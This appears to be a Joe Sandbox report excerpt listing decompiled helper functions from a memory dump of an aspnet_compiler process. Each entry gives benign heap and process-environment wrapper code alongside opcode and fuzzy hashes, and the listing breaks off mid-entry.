			E010DAD30(intOrPtr _a4) {

				return L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x010dad49

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 4468e7d5e1bd1b8e5eebb9696a3d4b22452aad81093f4973d5a5cbe2f6bafa5e
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 79C08C32080248BBC7126A45CD01F417B29E7A0B60F000020F6040AA618932E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 010F3A1C Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010F3A1C(intOrPtr _a4) {
				void* _t5;

				return L010F4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x010f3a35

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 7ae0496271abec98e4692a21a62b47c15afb2177b44636128e98d3353af0dfdb
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A3C08C32080248BBCB126E41DC01F027B29E7A4B60F000020BB040A9608572ED60D588

Uniqueness

Uniqueness Score: -1.00%

Function 011036CC Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011036CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x011036d2
0x011036e8
0x011036d4
0x011036e5
0x011036e5

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 0cc08d73fda2be3357cc882de599d49cb10661c3d30cccfea14624bb049e59a0
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 12C02B70160440FFDB1A1F30CD01F157254F710B21F6403587330858F0D6A89D00D100

Uniqueness

Uniqueness Score: -1.00%

Function 010E76E2 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x010e76e4
0x00000000
0x010e76f8
0x010e76fd

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 76938c9b0554180e96a6d348bd4058706f7df16d9e7afe7977dd59c4095b3117
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 48C08C702512805EEB2E5B0DCE29B203AD0BB0C60CF4801DCEB81098A2C368B802CA88

Uniqueness

Uniqueness Score: -1.00%

Function 010F7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010F7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x010f7d56
0x010f7d5b
0x010f7d60
0x010f7d5d
0x010f7d5d
0x010f7d5d

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 45e070658e5d28bcaf46be9d945da4161751189c15ce687308634a4b8b4b435d
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 0EB092353019408FCE56EF18C180B1533F4BB44A40B8800D4E400CBA21D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 01102ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01102ACB() {
				void* _t5;

				return E010EEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x01102adc

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 5defd0bee8b01b046645f98cda47581d9a0ce5fc6f1a8a959e27aaf635515d4c
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: E9B01232C10445CFCF02EF40C610B5A7371FB40750F054491900127930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0111AD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d811635664452ed97b97a03688c8ad2adbe88abae0931c396a34e66a99daf180
Instruction ID: f6a83c4180686f5f48fb99e17b011f56abe39ab5d0e2af143b7ba7b24d552269
Opcode Fuzzy Hash: d811635664452ed97b97a03688c8ad2adbe88abae0931c396a34e66a99daf180
Instruction Fuzzy Hash: 94900271A05010129544719999146464006B7E0791B65C015E4505654CCA948A7563E1

Uniqueness

Uniqueness Score: -1.00%

Function 01119520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f22a82edaca437ad58d7719313017bc35e18ab677b87ee138c781bb4dfd888b4
Instruction ID: 81992013df7b9dd4dc77e2d3d58218f737e228a27f3a53924aae13585ed9b855
Opcode Fuzzy Hash: f22a82edaca437ad58d7719313017bc35e18ab677b87ee138c781bb4dfd888b4
Instruction Fuzzy Hash: 069002E1201150924904A299D504B0A4505A7E0251B61C01AE5045660CC6658871A175

Uniqueness

Uniqueness Score: -1.00%

Function 01119950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 922ba682e7fc9cfb2b29c4707761d678a90e8b6d018f5b0c763589cfd17683fc
Instruction ID: cea3a98decc6918f7f76d155b8f2aec0a60dbad84cc950684928a0734316db2c
Opcode Fuzzy Hash: 922ba682e7fc9cfb2b29c4707761d678a90e8b6d018f5b0c763589cfd17683fc
Instruction Fuzzy Hash: 259002A120141403D544659999046070005A7D0352F61C015E6055655ECB698C717175

Uniqueness

Uniqueness Score: -1.00%

Function 01119560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326867d0dcc3113cdaf95c6fe50f328c7df478eb5f2a5c709c656a0c05a0f1b4
Instruction ID: 4706e47b1c77284fb3a4ef42da0210632913239d4ad2929fd4fe72b6873a14c4
Opcode Fuzzy Hash: 326867d0dcc3113cdaf95c6fe50f328c7df478eb5f2a5c709c656a0c05a0f1b4
Instruction Fuzzy Hash: DA900265221010020549A599570450B0445B7D63A13A1C019F5407690CC76188756361

Uniqueness

Uniqueness Score: -1.00%

Function 011199D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a70342391646a642b870559f73df7cc577d83095e8b57257ffca466cd4682ed
Instruction ID: d5dbbc1b0336d5e55396a6d6b8b69214962e1346a71a816e730d889c7c433b5a
Opcode Fuzzy Hash: 0a70342391646a642b870559f73df7cc577d83095e8b57257ffca466cd4682ed
Instruction Fuzzy Hash: 0A9002A121101042D508619995047060045A7E1251F61C016E6145654CC6698C716165

Uniqueness

Uniqueness Score: -1.00%

Function 011195F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67c9af8fe682e894785c4ca944d907853869b02b60723cb1a861c3562ac08aa
Instruction ID: f9a1a4f6daa0977498fb49dda01baebb54e427fe09db2fd4341fce41beb1fbc2
Opcode Fuzzy Hash: d67c9af8fe682e894785c4ca944d907853869b02b60723cb1a861c3562ac08aa
Instruction Fuzzy Hash: A790027120101802D508619999046860005A7D0351F61C015EA015755ED7A588B17171

Uniqueness

Uniqueness Score: -1.00%

Function 01119820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de932a4360ddea33433b07ce0003f977b2681e029da7d7699e8cab8096e6e12
Instruction ID: 63ad295a62b111ca6014ab3960a767dda0028875183ebac393a5008cb930cedf
Opcode Fuzzy Hash: 7de932a4360ddea33433b07ce0003f977b2681e029da7d7699e8cab8096e6e12
Instruction Fuzzy Hash: 4A90027124101402D545719995046060009B7D0291FA1C016E4415654EC7958A76BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0111B040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f41b97d0e66061ea925c74f7d9504ab8b824864e2a4fc510ea23f4b2c9fcfb6
Instruction ID: 1f28d95c31f20d67e5cccf9d99e81f354b3fcf56f150fc4b26efbb6849380389
Opcode Fuzzy Hash: 5f41b97d0e66061ea925c74f7d9504ab8b824864e2a4fc510ea23f4b2c9fcfb6
Instruction Fuzzy Hash: 5B9002A1601150434944B19999044065015B7E13513A1C125E4445660CC7A88875A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 011198A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b1daa6980cece9c391ace029fd45fa0b7931f872621758ff5886af323c678b
Instruction ID: 845a2aab0305b327389a4cb313cf81081217a8ec4edd7bc4f019894145c7afee
Opcode Fuzzy Hash: a8b1daa6980cece9c391ace029fd45fa0b7931f872621758ff5886af323c678b
Instruction Fuzzy Hash: 9B90026130101402D506619995146060009E7D1395FA1C016E5415655DC7658973B172

Uniqueness

Uniqueness Score: -1.00%

Function 0111A710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d61ea24f51b024677c98177d8e105d1ccfc0b1518b11cb5e79b2cd2148a7a50
Instruction ID: cbf423ca6a3e82ac1ac917993199606abdde30e835e56cf9efe4f44b1e186393
Opcode Fuzzy Hash: 7d61ea24f51b024677c98177d8e105d1ccfc0b1518b11cb5e79b2cd2148a7a50
Instruction Fuzzy Hash: B1900271301010529904A6D9A904A4A4105A7F0351B61D019E8005654CC69488716161

Uniqueness

Uniqueness Score: -1.00%

Function 01119B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 721698e5bc862aa33aeb663bb253acadd55adfa5e31fb6215c86bc91f4d6ccc3
Instruction ID: d1de270d7b06f9929d1d0d0b0946e1225feef8032a3c6ac1d864e5372280b6be
Opcode Fuzzy Hash: 721698e5bc862aa33aeb663bb253acadd55adfa5e31fb6215c86bc91f4d6ccc3
Instruction Fuzzy Hash: 4790026124101802D5447199D5147070006E7D0651F61C015E4015654DC756897576F1

Uniqueness

Uniqueness Score: -1.00%

Function 01119730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec27f4371639489e426be6ad667ce3e32794d561a216d907244a2aa6ee172b2d
Instruction ID: ec2aa4f46a086d14797c5e8fa4d486446533c14347c154fa6db4dd93b9a60a44
Opcode Fuzzy Hash: ec27f4371639489e426be6ad667ce3e32794d561a216d907244a2aa6ee172b2d
Instruction Fuzzy Hash: 6F90026160501402D5447199A5187060015A7D0251F61D015E4015654DC7998A7576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01119770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17d11a64fc501209e5ad171114fc4cf186db38687a5a349240e516ca98b9a7d
Instruction ID: b7408b1cafdb4e2a287d6069acc7e985f35c657fe841c9cc68dcc57017bff127
Opcode Fuzzy Hash: b17d11a64fc501209e5ad171114fc4cf186db38687a5a349240e516ca98b9a7d
Instruction Fuzzy Hash: EF90026120505442D5046599A508A060005A7D0255F61D015E5055695DC7758871B171

Uniqueness

Uniqueness Score: -1.00%

Function 0111A770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ced469b3d80b646ba90f7d76fa15378265ea9f9f345c9135ffe0e4508c613c2
Instruction ID: 7c925b9c8810b3335b463b878405f9096290b9bfee292f836998731335aecc82
Opcode Fuzzy Hash: 1ced469b3d80b646ba90f7d76fa15378265ea9f9f345c9135ffe0e4508c613c2
Instruction Fuzzy Hash: 0690027520505442D9046599A904A870005A7D0355F61D415E441569CDC7948871B161

Uniqueness

Uniqueness Score: -1.00%

Function 01119760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5d3803e84598afa999ee870041f505c5c7613e9eb1c137669ba92a662ee660
Instruction ID: 7f4b329e18a1b435f5bc51f151f67e874d099bc94c50407d58278398b44e9e9a
Opcode Fuzzy Hash: 3c5d3803e84598afa999ee870041f505c5c7613e9eb1c137669ba92a662ee660
Instruction Fuzzy Hash: E190027120101403D5046199A6087070005A7D0251F61D415E4415658DD79688717161

Uniqueness

Uniqueness Score: -1.00%

Function 0111A3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8ed56d8338b3d8446fda919ef578c4c557d3bc2348a32e53cf7722c7341a48
Instruction ID: 62389235c61a8fa53119e3f1dce9f1605b889dbb868f9353a65ae24185168a8a
Opcode Fuzzy Hash: 5f8ed56d8338b3d8446fda919ef578c4c557d3bc2348a32e53cf7722c7341a48
Instruction Fuzzy Hash: E390027120145002D5447199D54460B5005B7E0351F61C415E4416654CC7558876A261

Uniqueness

Uniqueness Score: -1.00%

Function 01119FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94891375a0e3bc0566035d1d43ea17492d4019c120b5c94c38c8392cb163b47
Instruction ID: 8a4a4a0822c1cc55aa3670558fec430de1ca72e8f821e1560c06b5ddfe16992f
Opcode Fuzzy Hash: e94891375a0e3bc0566035d1d43ea17492d4019c120b5c94c38c8392cb163b47
Instruction Fuzzy Hash: 3490027131115402D5146199D5047060005A7D1251F61C415E4815658DC7D588B17162

Uniqueness

Uniqueness Score: -1.00%

Function 01119610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa4c684ba272d4f89cc2365341ae1735edec828c8fdb85e704f8d404c27dc75
Instruction ID: 4a38721e104f3512e0588fbd1307c4960a49940eeee3a9ca14d4598352d6a1b1
Opcode Fuzzy Hash: 4fa4c684ba272d4f89cc2365341ae1735edec828c8fdb85e704f8d404c27dc75
Instruction Fuzzy Hash: 0E90027160501802D554719995147460005A7D0351F61C015E4015754DC7958A7576E1

Uniqueness

Uniqueness Score: -1.00%

Function 01119A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8ea9efe65d8536fafdf5aef38cfd194098872d522fb35e230a1063420e4696
Instruction ID: 9f0e6232e672e27702dd84873e7d7698a161126d2e0481a6fd428e9cc80e49a0
Opcode Fuzzy Hash: 8d8ea9efe65d8536fafdf5aef38cfd194098872d522fb35e230a1063420e4696
Instruction Fuzzy Hash: 6890027120141402D504619999087470005A7D0352F61C015E9155655EC7A5C8B17571

Uniqueness

Uniqueness Score: -1.00%

Function 01119650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80904e0173bafc4ef6a368e31c32f24571a0c0ce9dd99f3510a35f4b63aa65f
Instruction ID: df48e32c66cf0fbd6f6f5b3bf129df8223738d76088bd867ed4c99b9b21f8024
Opcode Fuzzy Hash: b80904e0173bafc4ef6a368e31c32f24571a0c0ce9dd99f3510a35f4b63aa65f
Instruction Fuzzy Hash: B890027120505842D54471999504A460015A7D0355F61C015E4055794DD7658D75B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01119A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75602a115cabef5afdc66d984101e91d74fbde0e331d43b68fd42a0438533f8e
Instruction ID: e6140798bce3a2bd1a98c6709c00fba77bf619a04f34c2ce6b7c58926bca3bcb
Opcode Fuzzy Hash: 75602a115cabef5afdc66d984101e91d74fbde0e331d43b68fd42a0438533f8e
Instruction Fuzzy Hash: DA90026120145442D54462999904B0F4105A7E1252FA1C01DE8147654CCA5588756761

Uniqueness

Uniqueness Score: -1.00%

Function 011196D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5711c547670329092d6e6799417257d101a4c467627f0d801e3d6fd5d39c782c
Instruction ID: 448172d44659785e84c2ce3fb7f7fb9cedf0260f32729ee3e40eab446da06f29
